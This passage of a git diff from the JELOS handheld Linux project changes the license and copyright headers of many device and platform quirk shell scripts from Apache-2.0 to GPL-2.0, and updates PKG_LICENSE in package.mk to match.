RK2023/010-governors +++ b/packages/hardware/quirks/devices/Powkiddy RK2023/010-governors @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/010-governors CPU_FREQ=("/sys/devices/system/cpu/cpufreq/policy0") diff --git a/packages/hardware/quirks/devices/Powkiddy RK2023/020-gpios b/packages/hardware/quirks/devices/Powkiddy RK2023/020-gpios index 147b1d2ab..357fcb108 100755 --- a/packages/hardware/quirks/devices/Powkiddy RK2023/020-gpios +++ b/packages/hardware/quirks/devices/Powkiddy RK2023/020-gpios @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/020-gpios DEVICE_WIFI="0" diff --git a/packages/hardware/quirks/devices/Powkiddy RK2023/030-suspend_mode b/packages/hardware/quirks/devices/Powkiddy RK2023/030-suspend_mode index bb0533c6f..addf08ec4 100755 --- a/packages/hardware/quirks/devices/Powkiddy RK2023/030-suspend_mode +++ b/packages/hardware/quirks/devices/Powkiddy RK2023/030-suspend_mode @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/devices/Powkiddy RK2023/040-display b/packages/hardware/quirks/devices/Powkiddy RK2023/040-display index c9dcc2f8a..107ddab32 100755 --- a/packages/hardware/quirks/devices/Powkiddy RK2023/040-display +++ b/packages/hardware/quirks/devices/Powkiddy RK2023/040-display @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Powkiddy RK2023/050-audio_path b/packages/hardware/quirks/devices/Powkiddy RK2023/050-audio_path index 42adac303..f5860cdb5 100755 --- a/packages/hardware/quirks/devices/Powkiddy RK2023/050-audio_path +++ b/packages/hardware/quirks/devices/Powkiddy RK2023/050-audio_path @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/002-audio_path DEVICE_PLAYBACK_PATH_SPK="HP" diff --git a/packages/hardware/quirks/devices/Powkiddy RK2023/050-game_configs b/packages/hardware/quirks/devices/Powkiddy RK2023/050-game_configs index 97a2de3e0..e96f4f3c8 100755 --- a/packages/hardware/quirks/devices/Powkiddy RK2023/050-game_configs +++ b/packages/hardware/quirks/devices/Powkiddy RK2023/050-game_configs @@ -1,6 +1,6 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Powkiddy x55/001-device_config b/packages/hardware/quirks/devices/Powkiddy x55/001-device_config index 41077af1b..ef044646c 100755 --- a/packages/hardware/quirks/devices/Powkiddy x55/001-device_config +++ b/packages/hardware/quirks/devices/Powkiddy x55/001-device_config @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-device_config DEVICE_FAKE_JACKSENSE="true" diff --git a/packages/hardware/quirks/devices/Powkiddy x55/010-governors b/packages/hardware/quirks/devices/Powkiddy x55/010-governors index eb19d9ccf..e1a462241 100755 --- a/packages/hardware/quirks/devices/Powkiddy x55/010-governors +++ b/packages/hardware/quirks/devices/Powkiddy x55/010-governors @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/010-governors CPU_FREQ=("/sys/devices/system/cpu/cpufreq/policy0") diff --git a/packages/hardware/quirks/devices/Powkiddy x55/020-gpios b/packages/hardware/quirks/devices/Powkiddy x55/020-gpios index 147b1d2ab..357fcb108 100755 --- a/packages/hardware/quirks/devices/Powkiddy x55/020-gpios +++ b/packages/hardware/quirks/devices/Powkiddy x55/020-gpios @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/020-gpios DEVICE_WIFI="0" diff --git a/packages/hardware/quirks/devices/Powkiddy x55/040-display b/packages/hardware/quirks/devices/Powkiddy x55/040-display index 9e19af122..334221d22 100755 --- a/packages/hardware/quirks/devices/Powkiddy x55/040-display +++ b/packages/hardware/quirks/devices/Powkiddy x55/040-display @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Powkiddy x55/040-hdmi b/packages/hardware/quirks/devices/Powkiddy x55/040-hdmi index cdd813404..bbc765643 100755 --- a/packages/hardware/quirks/devices/Powkiddy x55/040-hdmi +++ b/packages/hardware/quirks/devices/Powkiddy x55/040-hdmi @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Powkiddy x55/050-game_configs b/packages/hardware/quirks/devices/Powkiddy x55/050-game_configs index 97a2de3e0..e96f4f3c8 100755 --- a/packages/hardware/quirks/devices/Powkiddy x55/050-game_configs +++ b/packages/hardware/quirks/devices/Powkiddy x55/050-game_configs @@ -1,6 +1,6 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Powkiddy x55/sleep.d/post/001-audio b/packages/hardware/quirks/devices/Powkiddy x55/sleep.d/post/001-audio index 046a8962d..bc699e452 100644 --- a/packages/hardware/quirks/devices/Powkiddy x55/sleep.d/post/001-audio +++ b/packages/hardware/quirks/devices/Powkiddy x55/sleep.d/post/001-audio @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Workaround for no audio on wake from sleep. diff --git a/packages/hardware/quirks/devices/ayn Loki Zero/010-led_control b/packages/hardware/quirks/devices/ayn Loki Zero/010-led_control index f49d91971..d651b9b28 100755 --- a/packages/hardware/quirks/devices/ayn Loki Zero/010-led_control +++ b/packages/hardware/quirks/devices/ayn Loki Zero/010-led_control @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/010-led_control DEVICE_LED_CONTROL="true" diff --git a/packages/hardware/quirks/devices/ayn Loki Zero/020-audio_latency b/packages/hardware/quirks/devices/ayn Loki Zero/020-audio_latency index b1ede27ae..3327ac7bc 100644 --- a/packages/hardware/quirks/devices/ayn Loki Zero/020-audio_latency +++ b/packages/hardware/quirks/devices/ayn Loki Zero/020-audio_latency @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/devices/ayn Loki Zero/020-fan_control b/packages/hardware/quirks/devices/ayn Loki Zero/020-fan_control index 0d93b9235..ee05cc9bc 100755 --- a/packages/hardware/quirks/devices/ayn Loki Zero/020-fan_control +++ b/packages/hardware/quirks/devices/ayn Loki Zero/020-fan_control @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/020-fan_control DEVICE_HAS_FAN="true" diff --git a/packages/hardware/quirks/devices/ayn Loki Zero/050-modifiers b/packages/hardware/quirks/devices/ayn Loki Zero/050-modifiers index d6f81744e..ba2616800 100755 --- a/packages/hardware/quirks/devices/ayn Loki Zero/050-modifiers +++ b/packages/hardware/quirks/devices/ayn Loki Zero/050-modifiers @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/050-modifiers DEVICE_FUNC_KEYA_MODIFIER="BTN_MODE" diff --git a/packages/hardware/quirks/devices/ayn Loki Zero/bin/fancontrol b/packages/hardware/quirks/devices/ayn Loki Zero/bin/fancontrol index 59ec2856a..50b74e57f 100755 --- a/packages/hardware/quirks/devices/ayn Loki Zero/bin/fancontrol +++ b/packages/hardware/quirks/devices/ayn Loki Zero/bin/fancontrol @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/ayn Loki Zero/bin/ledcontrol b/packages/hardware/quirks/devices/ayn Loki Zero/bin/ledcontrol index 5d803bdb2..4d796788b 100755 --- a/packages/hardware/quirks/devices/ayn Loki Zero/bin/ledcontrol +++ b/packages/hardware/quirks/devices/ayn Loki Zero/bin/ledcontrol @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # A simple tool to manipulate the controller LEDs using ectool, thanks to diff --git a/packages/hardware/quirks/package.mk b/packages/hardware/quirks/package.mk index 90a8cb983..cff5bbd52 100644 --- a/packages/hardware/quirks/package.mk +++ b/packages/hardware/quirks/package.mk @@ -1,10 +1,10 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="quirks" PKG_VERSION="" PKG_ARCH="any" -PKG_LICENSE="apache2" +PKG_LICENSE="GPLv2" PKG_SITE="" PKG_URL="" PKG_DEPENDS_TARGET="toolchain autostart ioport ectool" diff --git a/packages/hardware/quirks/platforms/AMD64/001-device_config b/packages/hardware/quirks/platforms/AMD64/001-device_config index d8c3a316a..309b6dd55 100755 --- a/packages/hardware/quirks/platforms/AMD64/001-device_config +++ b/packages/hardware/quirks/platforms/AMD64/001-device_config @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/platforms/AMD64/010-default_tdp b/packages/hardware/quirks/platforms/AMD64/010-default_tdp index f51626a0f..029b01540 100755 --- a/packages/hardware/quirks/platforms/AMD64/010-default_tdp +++ b/packages/hardware/quirks/platforms/AMD64/010-default_tdp @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/platforms/AMD64/030-suspend_mode b/packages/hardware/quirks/platforms/AMD64/030-suspend_mode index eb7986cd2..95a4cad16 100755 --- a/packages/hardware/quirks/platforms/AMD64/030-suspend_mode +++ b/packages/hardware/quirks/platforms/AMD64/030-suspend_mode @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/platforms/AMD64/050-audio_path b/packages/hardware/quirks/platforms/AMD64/050-audio_path index 0aafc6565..5feee6024 100755 --- a/packages/hardware/quirks/platforms/AMD64/050-audio_path +++ b/packages/hardware/quirks/platforms/AMD64/050-audio_path @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/002-audio_path DEVICE_PLAYBACK_PATH_SPK="SPK" diff --git a/packages/hardware/quirks/platforms/AMD64/050-modifiers b/packages/hardware/quirks/platforms/AMD64/050-modifiers index 0d99db6c0..1e918ab21 100755 --- a/packages/hardware/quirks/platforms/AMD64/050-modifiers +++ b/packages/hardware/quirks/platforms/AMD64/050-modifiers @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/050-modifiers DEVICE_FUNC_KEYA_MODIFIER="KEY_RIGHTCTRL" diff --git a/packages/hardware/quirks/platforms/AMD64/090-ui_service b/packages/hardware/quirks/platforms/AMD64/090-ui_service index eeafb89b2..bc7013fc9 100755 --- a/packages/hardware/quirks/platforms/AMD64/090-ui_service +++ b/packages/hardware/quirks/platforms/AMD64/090-ui_service @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### Set the default device configuration cat </storage/.config/profile.d/090-ui_service diff --git a/packages/hardware/quirks/platforms/RK3326/010-governors b/packages/hardware/quirks/platforms/RK3326/010-governors index 35a14b381..0686b336a 100644 --- a/packages/hardware/quirks/platforms/RK3326/010-governors +++ b/packages/hardware/quirks/platforms/RK3326/010-governors @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/010-governors CPU_FREQ=("/sys/devices/system/cpu/cpufreq/policy0") diff --git a/packages/hardware/quirks/platforms/RK3326/050-audio_path b/packages/hardware/quirks/platforms/RK3326/050-audio_path index 87eafdfc0..0e619c4e5 100644 --- a/packages/hardware/quirks/platforms/RK3326/050-audio_path +++ b/packages/hardware/quirks/platforms/RK3326/050-audio_path @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/002-audio_path DEVICE_PLAYBACK_PATH="Playback Mux" diff --git a/packages/hardware/quirks/platforms/RK3326/050-modifiers b/packages/hardware/quirks/platforms/RK3326/050-modifiers index 3bc7769d6..8c0961439 100644 --- a/packages/hardware/quirks/platforms/RK3326/050-modifiers +++ b/packages/hardware/quirks/platforms/RK3326/050-modifiers @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/050-modifiers DEVICE_FUNC_KEYA_MODIFIER="BTN_SELECT" diff --git a/packages/hardware/quirks/platforms/RK3326/060-game_settings b/packages/hardware/quirks/platforms/RK3326/060-game_settings index 0b5a13960..63938e387 100644 --- a/packages/hardware/quirks/platforms/RK3326/060-game_settings +++ b/packages/hardware/quirks/platforms/RK3326/060-game_settings @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/platforms/RK3326/090-ui_service b/packages/hardware/quirks/platforms/RK3326/090-ui_service index eeafb89b2..bc7013fc9 100644 --- a/packages/hardware/quirks/platforms/RK3326/090-ui_service +++ b/packages/hardware/quirks/platforms/RK3326/090-ui_service @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### Set the default device configuration cat </storage/.config/profile.d/090-ui_service diff --git a/packages/hardware/quirks/platforms/RK3399/040-affinity b/packages/hardware/quirks/platforms/RK3399/040-affinity index 086f80e38..2896dabc8 100644 --- a/packages/hardware/quirks/platforms/RK3399/040-affinity +++ b/packages/hardware/quirks/platforms/RK3399/040-affinity @@ -1,7 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius -# Copyright (C) 2022-present Brooksytech +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/040-affinity SLOW_CORES="taskset -c 0-3" diff --git a/packages/hardware/quirks/platforms/RK3399/050-modifiers b/packages/hardware/quirks/platforms/RK3399/050-modifiers index 1fefd6e79..e13599833 100755 --- a/packages/hardware/quirks/platforms/RK3399/050-modifiers +++ b/packages/hardware/quirks/platforms/RK3399/050-modifiers @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/050-modifiers DEVICE_KEY_VOLUMEDOWN=114 diff --git a/packages/hardware/quirks/platforms/RK3399/060-game_settings b/packages/hardware/quirks/platforms/RK3399/060-game_settings index 0b5a13960..63938e387 100755 --- a/packages/hardware/quirks/platforms/RK3399/060-game_settings +++ b/packages/hardware/quirks/platforms/RK3399/060-game_settings @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/platforms/RK3399/090-ui_service b/packages/hardware/quirks/platforms/RK3399/090-ui_service index eeafb89b2..bc7013fc9 100755 --- a/packages/hardware/quirks/platforms/RK3399/090-ui_service +++ b/packages/hardware/quirks/platforms/RK3399/090-ui_service @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### Set the default device configuration cat </storage/.config/profile.d/090-ui_service diff --git a/packages/hardware/quirks/platforms/RK3566/001-device_config b/packages/hardware/quirks/platforms/RK3566/001-device_config index b146a74af..1647feaab 100755 --- a/packages/hardware/quirks/platforms/RK3566/001-device_config +++ b/packages/hardware/quirks/platforms/RK3566/001-device_config @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-device_config DEVICE_FAKE_JACKSENSE="false" diff --git a/packages/hardware/quirks/platforms/RK3566/050-audio_path b/packages/hardware/quirks/platforms/RK3566/050-audio_path index 0aafc6565..5feee6024 100755 --- a/packages/hardware/quirks/platforms/RK3566/050-audio_path +++ b/packages/hardware/quirks/platforms/RK3566/050-audio_path @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/002-audio_path DEVICE_PLAYBACK_PATH_SPK="SPK" diff --git a/packages/hardware/quirks/platforms/RK3566/050-modifiers b/packages/hardware/quirks/platforms/RK3566/050-modifiers index 1fefd6e79..e13599833 100755 --- a/packages/hardware/quirks/platforms/RK3566/050-modifiers +++ b/packages/hardware/quirks/platforms/RK3566/050-modifiers @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/050-modifiers DEVICE_KEY_VOLUMEDOWN=114 diff --git a/packages/hardware/quirks/platforms/RK3566/060-game_settings b/packages/hardware/quirks/platforms/RK3566/060-game_settings index 0b5a13960..63938e387 100755 --- a/packages/hardware/quirks/platforms/RK3566/060-game_settings +++ b/packages/hardware/quirks/platforms/RK3566/060-game_settings @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/platforms/RK3566/090-ui_service b/packages/hardware/quirks/platforms/RK3566/090-ui_service index 122c2b116..accf1e59d 100755 --- a/packages/hardware/quirks/platforms/RK3566/090-ui_service +++ b/packages/hardware/quirks/platforms/RK3566/090-ui_service @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### Set the default device configuration cat </storage/.config/profile.d/090-ui_service diff --git a/packages/hardware/quirks/platforms/RK3588/001-device_config b/packages/hardware/quirks/platforms/RK3588/001-device_config index 8e5dbd63e..cdf14f241 100644 --- a/packages/hardware/quirks/platforms/RK3588/001-device_config +++ b/packages/hardware/quirks/platforms/RK3588/001-device_config @@ -1,7 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius -# Copyright (C) 2022-present Brooksytech +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-device_config DEVICE_VOLUMECTL="true" diff --git a/packages/hardware/quirks/platforms/RK3588/010-governors b/packages/hardware/quirks/platforms/RK3588/010-governors index d41d40bce..7d16a22f1 100644 --- a/packages/hardware/quirks/platforms/RK3588/010-governors +++ b/packages/hardware/quirks/platforms/RK3588/010-governors @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/010-governors CPU_FREQ=("/sys/devices/system/cpu/cpufreq/policy0" "/sys/devices/system/cpu/cpufreq/policy4" "/sys/devices/system/cpu/cpufreq/policy6") diff --git a/packages/hardware/quirks/platforms/RK3588/040-affinity b/packages/hardware/quirks/platforms/RK3588/040-affinity index 4e0173930..9d5b403e0 100644 --- a/packages/hardware/quirks/platforms/RK3588/040-affinity +++ b/packages/hardware/quirks/platforms/RK3588/040-affinity @@ -1,7 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius -# Copyright (C) 2022-present Brooksytech +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/040-affinity SLOW_CORES="taskset -c 0-3" diff --git a/packages/hardware/quirks/platforms/RK3588/050-audio_path b/packages/hardware/quirks/platforms/RK3588/050-audio_path index d4014ee19..3e31680b0 100644 --- a/packages/hardware/quirks/platforms/RK3588/050-audio_path +++ b/packages/hardware/quirks/platforms/RK3588/050-audio_path @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/002-audio_path DEVICE_PLAYBACK_PATH="Playback Path" diff --git a/packages/hardware/quirks/platforms/RK3588/050-modifiers b/packages/hardware/quirks/platforms/RK3588/050-modifiers index 3bc7769d6..8c0961439 100644 --- a/packages/hardware/quirks/platforms/RK3588/050-modifiers +++ b/packages/hardware/quirks/platforms/RK3588/050-modifiers @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/050-modifiers DEVICE_FUNC_KEYA_MODIFIER="BTN_SELECT" diff --git a/packages/hardware/quirks/platforms/RK3588/090-ui_service b/packages/hardware/quirks/platforms/RK3588/090-ui_service index eeafb89b2..bc7013fc9 100644 --- a/packages/hardware/quirks/platforms/RK3588/090-ui_service +++ b/packages/hardware/quirks/platforms/RK3588/090-ui_service @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### Set the default device configuration cat </storage/.config/profile.d/090-ui_service diff --git a/packages/hardware/quirks/platforms/S922X/001-device_config b/packages/hardware/quirks/platforms/S922X/001-device_config index 76673e15d..e5e2368d9 100755 --- a/packages/hardware/quirks/platforms/S922X/001-device_config +++ b/packages/hardware/quirks/platforms/S922X/001-device_config @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-deviceconfig # Device Features diff --git a/packages/hardware/quirks/platforms/S922X/010-governors b/packages/hardware/quirks/platforms/S922X/010-governors index aaae06939..b244dccd6 100755 --- a/packages/hardware/quirks/platforms/S922X/010-governors +++ b/packages/hardware/quirks/platforms/S922X/010-governors @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/010-governors CPU_FREQ=("/sys/devices/system/cpu/cpufreq/policy0" "/sys/devices/system/cpu/cpufreq/policy2") diff --git a/packages/hardware/quirks/platforms/S922X/030-suspend_mode b/packages/hardware/quirks/platforms/S922X/030-suspend_mode index bdbd495d9..96388b0f5 100755 --- a/packages/hardware/quirks/platforms/S922X/030-suspend_mode +++ 